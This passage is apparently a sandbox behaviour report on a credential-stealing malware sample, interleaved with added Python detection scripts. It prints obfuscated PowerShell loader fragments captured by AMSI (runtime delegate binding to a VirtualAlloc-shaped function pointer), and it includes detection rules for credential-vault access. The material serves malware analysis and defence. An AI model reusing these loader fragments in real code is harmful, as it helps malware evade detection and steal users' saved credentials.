            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: kernel.appcore.dll
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: windows.storage.dll
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: wldp.dll
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: profapi.dll
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: riched20.dll
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: usp10.dll
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: msls31.dll
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: textinputframework.dll
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: coreuicomponents.dll
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: coremessaging.dll
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: wintypes.dll (3 consecutive identical rows)
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: textshaping.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll (2 consecutive identical rows)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: iertutil.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: winhttp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: winnsi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: urlmon.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: srvcli.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: netutils.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: mscoree.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: version.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: wbemcomn.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: amsi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: userenv.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: rasapi32.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: rasman.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: rtutils.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: secur32.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: schannel.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: mskeyprotect.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: ntasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: ncrypt.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: ncryptsslp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: gpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: vaultcli.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: wintypes.dll
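The module-load rows above are the quickest way to see what each process became: wabmig.exe, the native Windows Address Book migration tool, ends up loading mscoree.dll (the CLR) together with vaultcli.dll (the Windows Credential Manager client), schannel.dll and wininet.dll, which is a managed credential stealer running inside a hollowed Windows binary rather than anything a mail-migration tool needs. Below is an added example, not part of the Joe Sandbox report, that parses rows in this form (the text export drops the column separator, so the image path runs straight into "Section loaded:"), groups DLLs per process and applies a few capability rules. The list of expected .NET hosts, the rules and their weights, and the sample rows are the author's assumptions modelled on the report.

```python
"""Triage "Section loaded" rows from a sandbox report, per process.

Added example, not part of the Joe Sandbox report. Rows come in the form
"Source: <image>Section loaded: <dll>" (the text export drops the column
separator, so the image path runs into "Section loaded:"); a " | "
separator, if present, is tolerated. The host list, the capability rules,
their weights and the sample rows are assumptions modelled on the report.
"""
import re
from collections import defaultdict

ROW = re.compile(r"^Source:\s*(?P<image>.+?)\s*\|?\s*Section loaded:\s*(?P<dll>[\w.\-]+)", re.I)

# Images expected to host the CLR. mscoree.dll in any other image means
# managed code was loaded into a native process (injection / hollowing).
DOTNET_HOSTS = {"powershell.exe", "powershell_ise.exe", "msbuild.exe", "installutil.exe"}

# dll -> (what its presence gives the process, weight). Assumed weights.
CAPABILITY = {
    "vaultcli.dll": ("Windows Credential Manager (Vault) client", 3),
    "dpapi.dll":    ("DPAPI unprotect, used to decrypt saved browser/mail secrets", 2),
    "schannel.dll": ("outbound TLS", 1),
    "wininet.dll":  ("HTTP client (WinINet)", 1),
    "winhttp.dll":  ("HTTP client (WinHTTP)", 1),
    "amsi.dll":     ("AMSI initialised (script engine or CLR Assembly.Load)", 1),
}

def parse_rows(lines):
    """Map image basename (lower-case) -> ordered, de-duplicated DLL list."""
    loads = defaultdict(list)
    for line in lines:
        m = ROW.match(line.strip())
        if not m:
            continue
        image = m.group("image").replace("/", "\\").split("\\")[-1].lower()
        dll = m.group("dll").lower()
        if dll not in loads[image]:
            loads[image].append(dll)
    return loads

def triage(loads):
    """Return image -> (score, findings) for every image with a finding."""
    result = {}
    for image, dlls in loads.items():
        findings, score = [], 0
        if "mscoree.dll" in dlls and image not in DOTNET_HOSTS:
            findings.append("mscoree.dll: CLR loaded into a native image")
            score += 4
        for dll in dlls:
            if dll in CAPABILITY:
                text, weight = CAPABILITY[dll]
                findings.append(f"{dll}: {text}")
                score += weight
        if findings:
            result[image] = (score, findings)
    return result

# Constructed sample rows, modelled on the report (one deliberate duplicate,
# and both the fused and the " | "-separated row forms).
SAMPLE_ROWS = [
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll",
    r"Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exeSection loaded: uxtheme.dll",
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: wininet.dll",
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: mscoree.dll",
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: amsi.dll",
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: schannel.dll",
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: vaultcli.dll",
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: vaultcli.dll",
]

if __name__ == "__main__":
    report = triage(parse_rows(SAMPLE_ROWS))
    for image, (score, findings) in sorted(report.items(), key=lambda kv: -kv[1][0]):
        print(f"{image}: score {score}")
        for finding in findings:
            print(f"  - {finding}")
```

On the sample rows wabmig.exe scores highest because the CLR-in-native-image rule fires on top of the vaultcli.dll and TLS loads, while powershell.exe, which is expected to host the CLR, only picks up the dpapi.dll and amsi.dll capability notes. Feed the real rows from the report (or a Sysmon Event ID 7 export converted to the same two fields) through parse_rows to reproduce the triage on live data.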
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
            Source: Ze1Ueabtx5.img | Static file information: File size 1310720 > 1048576
            Source: Binary string: System.Management.Automation.pdb | source: powershell.exe, 00000006.00000002.2465970106.000000000760E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: em.Core.pdb | source: powershell.exe, 00000006.00000002.2469658743.000000000882C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb | source: powershell.exe, 00000006.00000002.2465970106.000000000760E000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Yara match | File source: 00000006.00000002.2470285181.0000000009291000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Carboxylase $Libyerne $Prisere), (Harminic @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Xerotherm = [AppDomain]::CurrentDomain.GetAssemblies()$global:Ch
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($efterkrigsaarene)), $hjernekiste).DefineDynamicModule($Sexsymboler, $false).DefineType($Chorale, $Trosbekendelserne, [System.Multicast
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created (dropped file): \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | File created (dropped file): C:\Users\user\AppData\Local\Temp\nsl39F4.tmp\nsExec.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created (dropped file): C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe
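The two AMSI captures above are the working core of the PowerShell stage: a delegate type is emitted at runtime (DefineDynamicAssembly, then DefineDynamicModule, then DefineType on System.MulticastDelegate) and bound to a native function pointer with GetDelegateForFunctionPointer, so the script never contains Add-Type, DllImport or a recognisable Win32 API name. The delegate signature ([IntPtr], [UInt32], [UInt32], [UInt32]) returning [IntPtr] has the same shape as VirtualAlloc on 32-bit PowerShell, which is why the "unpacking or dynamic code loading" signature fires. All identifiers (Carboxylase, Libyerne, Harminic, ...) are dictionary words and change per build, so any detection has to key on the .NET API surface instead. The scanner below is an added example, not code from the report or from the sample; it scores ScriptBlock (Event ID 4104) or AMSI text against that API surface. The rule weights, the threshold and the sample blocks are the author's assumptions, and the malicious sample is a constructed completion of the two truncated fragments quoted in the report.

```python
"""Score PowerShell script-block text for runtime delegate construction.

Added example, not code from the report or from the sample. It matches on
the .NET API surface the AMSI captures expose, not on identifiers (the
loader randomises those), and is meant for ScriptBlock (4104) or AMSI
text. Rule weights, the threshold and the sample blocks are the author's
assumptions; sample 0 is a constructed completion of the report's two
truncated fragments.
"""
import re

RULES = [
    # (name, weight, pattern)
    ("delegate_bind",      3, r"GetDelegateForFunctionPointer"),
    ("dynamic_assembly",   2, r"DefineDynamicAssembly"),
    ("dynamic_module",     1, r"DefineDynamicModule"),
    ("delegate_type",      2, r"DefineType\(.*?System\.MulticastDelegate"),
    ("assembly_walk",      1, r"\[AppDomain\]::CurrentDomain\.GetAssemblies\(\)"),
    # [IntPtr],[UInt32],[UInt32],[UInt32] -> [IntPtr] is the shape of
    # VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect) on x86.
    ("virtualalloc_shape", 3,
     r"\[IntPtr\]\s*,\s*\[UInt32\]\s*,\s*\[UInt32\]\s*,\s*\[UInt32\]\s*\)\s*\(\s*\[IntPtr\]\s*\)"),
]
# Case-insensitive because PowerShell is; DOTALL because blocks span lines.
COMPILED = [(name, weight, re.compile(pat, re.I | re.S)) for name, weight, pat in RULES]
THRESHOLD = 5   # one reflection call is normal; the combination is not

def score_block(text):
    """Return (score, [names of the rules that matched]) for one block."""
    hits = [name for name, _, rx in COMPILED if rx.search(text)]
    score = sum(weight for name, weight, _ in COMPILED if name in hits)
    return score, hits

def scan(blocks, threshold=THRESHOLD):
    """Return [(index, score, hits)] for every block at or above threshold."""
    flagged = []
    for i, text in enumerate(blocks):
        score, hits = score_block(text)
        if score >= threshold:
            flagged.append((i, score, hits))
    return flagged

SAMPLES = [
    # 0: constructed completion of the two AMSI fragments from the report
    "GetDelegateForFunctionPointer((Carboxylase $Libyerne $Prisere), "
    "(Harminic @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))"
    "$global:Xerotherm = [AppDomain]::CurrentDomain.GetAssemblies()"
    "DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($efterkrigsaarene)), $hjernekiste)"
    ".DefineDynamicModule($Sexsymboler, $false)"
    ".DefineType($Chorale, $Trosbekendelserne, [System.MulticastDelegate])",
    # 1: ordinary admin one-liner (constructed)
    "Get-ChildItem C:\\Logs -Filter *.evtx | Where-Object { $_.Length -gt 1MB }",
    # 2: a single reflection call on its own, common in legitimate scripts (constructed)
    "[AppDomain]::CurrentDomain.GetAssemblies() | Select-Object FullName",
    # 3: one delegate bind with an unrelated signature stays below threshold (constructed)
    "$d = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptr, [Func[int]])",
]

if __name__ == "__main__":
    for i, score, hits in scan(SAMPLES):
        print(f"block {i}: score {score} hits={hits}")
```

Only sample 0 crosses the threshold; a lone GetDelegateForFunctionPointer or GetAssemblies call scores 3 or 1 and is left alone, which keeps interop helpers in ordinary admin tooling out of the alert queue. Lowering the threshold to 3 would also flag sample 3, so tune it against a baseline of the scripts that actually run in the environment.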

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 identical rows collapsed)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 identical rows collapsed)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (SetErrorMode SEM_NOOPENFILEERRORBOX, suppresses the "file not found" error dialog; 114 identical rows collapsed)
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Process information set: NOOPENFILEERRORBOX (5 identical rows collapsed)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (25 identical rows collapsed)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
